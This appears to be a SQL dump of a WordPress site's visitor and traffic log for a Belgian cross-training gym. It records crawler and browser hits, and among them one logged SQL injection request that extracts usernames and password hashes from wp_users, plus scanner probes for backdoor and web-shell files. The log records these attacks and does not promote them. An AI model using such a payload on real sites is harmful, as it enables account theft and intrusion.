(70947, 1493391705.196993, 629871318, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'SafeDNSBot (https://www.safedns.com/searchbot)'),
(70946, 1493391704.777477, 629871318, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'SafeDNSBot (https://www.safedns.com/searchbot)'),
(70945, 1493383359.187754, 3323226906, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(70944, 1493381104.612841, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70943, 1493381104.032877, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70941, 1493381102.617885, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70942, 1493381103.207652, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70940, 1493381101.987359, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70939, 1493381101.133966, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70937, 1493381099.832203, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70938, 1493381100.442615, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70936, 1493381099.150282, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70935, 1493381098.591970, 1375112542, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70933, 1493374662.639487, 1538649748, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/10603.1.30.0.34 CFNetwork/720.5.7 Darwin/14.5.0 (x86_64)'),
(70934, 1493381097.934427, 1375112542, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(70931, 1493374662.092272, 1538649748, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/10603.1.30.0.34 CFNetwork/720.5.7 Darwin/14.5.0 (x86_64)'),
(70932, 1493374662.116801, 1538649748, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30'),
(70930, 1493374660.631877, 1538649748, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30'),
(70929, 1493374641.532576, 1538649748, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30'),
(70928, 1493370110.757058, 3339975108, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)'),
(70927, 1493370110.485308, 3234106972, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)'),
(70926, 1493370098.649715, 3234106972, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)'),
(70925, 1493370096.678007, 3339975108, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)'),
(70924, 1493370096.409181, 3234106972, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)'),
(70923, 1493370089.847105, 3234106972, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)'),
(70922, 1493370088.180356, 3234106972, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.bing.com/search?q=cross+training+bruxelles&src=ie9tr', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)'),
(70921, 1493370087.004008, 3339975108, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)'),
(70919, 1493341771.086778, 2499535434, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup.com/crawler.html)'),
(70920, 1493351675.008488, 2499535434, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup.com/crawler.html)'),
(70918, 1493341768.141709, 2499535434, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup.com/crawler.html)'),
(70917, 1493341002.666322, 1833311020, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70915, 1493333135.124151, 3163187461, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-dreamworkgallery/css/admin.css', '', 'Mozilla/5.0 (WordPress.com; http://support.wordpress.com/contact)'),
(70916, 1493336888.147782, 2996488257, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(70914, 1493332671.399503, 2905398467, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'),
(70913, 1493326376.332462, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70912, 1493326375.679252, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70911, 1493326374.862655, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70909, 1493326369.742150, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70910, 1493326371.838556, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70908, 1493326368.747862, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70907, 1493326367.976443, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(70906, 1493326367.534513, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70904, 1493326366.680732, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70905, 1493326367.118512, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70903, 1493326366.145861, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70902, 1493326365.720702, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70901, 1493326364.987786, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70900, 1493326363.920109, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(70899, 1493316316.843267, 1837857107, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Linux; Android 5.1.1; SM-J500FN Build/LMY48B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.36'),
(70898, 1493316314.682519, 1837857107, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.google.be/', 'Mozilla/5.0 (Linux; Android 5.1.1; SM-J500FN Build/LMY48B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.36'),
(70896, 1493305326.035028, 3475901820, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70897, 1493313617.724259, 1049233326, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9,10,11,12+from+wp_users--', '', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36'),
(70894, 1493305232.295773, 1837953980, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70895, 1493305232.987912, 1837953980, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70893, 1493305231.784312, 1837953980, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70892, 1493305231.192120, 1837953980, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70891, 1493305230.577187, 1837953980, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70890, 1493305229.907109, 1837953980, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70888, 1493305228.857230, 1837953980, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70889, 1493305229.398763, 1837953980, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70887, 1493305228.411605, 1837953980, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70886, 1493305227.909287, 1837953980, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70864, 1493266758.371298, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(70863, 1493266743.800217, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(70862, 1493266734.303396, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(70861, 1493266729.825626, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(70860, 1493265991.030108, 3392025247, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36'),
(70859, 1493261236.153075, 2366158596, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(70858, 1493261232.319024, 2996485408, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(70857, 1493261232.059341, 2366148291, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(70856, 1493259548.405748, 1539836988, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/fluid_forms/file-upload/server/content/', 'http://www.crosstrainingcenter.be/wp-content/plugins/fluid_forms/file-upload/server/content/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(70854, 1493254830.597619, 2760155479, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(70855, 1493258358.909500, 2637637525, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)'),
(70853, 1493240081.700108, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70851, 1493240063.090215, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70852, 1493240077.671981, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70850, 1493240057.408049, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70849, 1493240018.636322, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70848, 1493240014.212924, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70847, 1493240007.484018, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70846, 1493240000.011480, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70845, 1493239995.213333, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70844, 1493239944.813169, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70843, 1493239939.399269, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70842, 1493239938.946169, 2297635928, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70841, 1493237502.283528, 1123632454, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70840, 1493233015.785213, 2637637385, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70839, 1493232474.632667, 3641698364, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(69177, 1491821919.192657, 1160651783, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36'),
(69178, 1491829091.022008, 1123631639, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69179, 1491829554.251652, 1123631639, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69180, 1491829941.153060, 1123631639, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69181, 1491830377.485878, 1123631639, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69182, 1491830822.485356, 1123631639, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69183, 1491831265.468744, 1123631639, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69184, 1491831659.926057, 1439268003, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-limelette/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(69185, 1491831663.963787, 1123631639, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69186, 1491832067.475007, 1123631639, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69187, 1491832532.298477, 1123631639, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69188, 1491833369.599544, 3475901914, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69189, 1491835850.150775, 522139388, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', 'https://www.google.ch/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:52.0) Gecko/20100101 Firefox/52.0'),
(69190, 1491835851.956000, 522139388, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:52.0) Gecko/20100101 Firefox/52.0'),
(69191, 1491836655.447424, 3567663235, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjA7PbNlJrTAhUSGhQKHd6PAGQQFggdMAA&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2F&usg=AFQjCNFlnF2lMOWCGxV4AnRa451d2QSVkQ&sig2=_s_41FaqNiZmVstNxzODZg', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0'),
(69192, 1491836659.791585, 3567663235, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0'),
(69193, 1491836660.199913, 3567663235, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0'),
(69194, 1491838694.762187, 3475901903, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69195, 1491840311.690623, 2745971880, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/update.php', '', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'),
(69196, 1491840313.424868, 2745971880, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/update.php', '', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'),
(69197, 1491842133.379245, 874482351, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://webxtrakt.be/crosstrainingcenter.be', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36'),
(69198, 1491852096.331116, 2637637422, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69199, 1491852096.893277, 2637637422, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69200, 1491855226.757596, 782305556, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0'),
(69201, 1491855227.434369, 782305556, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0'),
(69202, 1491859741.601122, 1565815695, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/version.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(69203, 1491859755.904790, 1565815695, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/admin/language/english/total/arhive.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(69204, 1491859962.790844, 1565815695, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/cmsbuild.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(69205, 1491860469.761174, 1565815695, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/media/version.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(69206, 1491860533.499399, 1565815695, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/dump.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(69207, 1491860549.016493, 1565815695, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-api.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(69208, 1491860750.155426, 1565815695, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/common.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(69209, 1491860962.956055, 1565815695, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/cmsbuild.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(69210, 1491861124.635732, 1565815695, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/mod_ariimageslidersa.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
